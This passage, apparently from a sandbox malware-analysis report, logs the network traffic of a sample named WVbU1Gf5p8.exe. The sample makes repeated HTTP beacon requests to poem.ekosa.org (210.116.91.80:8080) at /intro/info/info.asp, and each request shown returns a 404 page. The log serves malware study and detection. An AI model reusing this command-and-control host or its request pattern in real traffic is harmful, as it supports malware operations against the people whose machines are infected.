      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:18.562208891 CET471INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      37192.168.2.449803210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:18.824387074 CET472OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:19.081305027 CET476INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      38192.168.2.449805210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:19.348949909 CET479OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:19.612787008 CET480INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:19 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      39192.168.2.449806210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:20.001885891 CET480OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:20.271342993 CET481INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:19 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      4192.168.2.449762210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:58.937810898 CET107OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:59.198338032 CET108INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:59 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      40192.168.2.449807210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:20.544534922 CET482OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:20.805959940 CET482INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:20 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      41192.168.2.449808210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:21.083111048 CET483OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:21.354104996 CET483INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:20 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      42192.168.2.449809210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:21.728523016 CET484OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:21.991290092 CET485INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      43192.168.2.449810210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:22.255980968 CET485OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:22.516060114 CET486INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      44192.168.2.449811210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:22.804016113 CET487OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:23.083775043 CET487INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:22 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      45192.168.2.449812210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:23.467602015 CET488OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:23.732043982 CET488INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:22 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
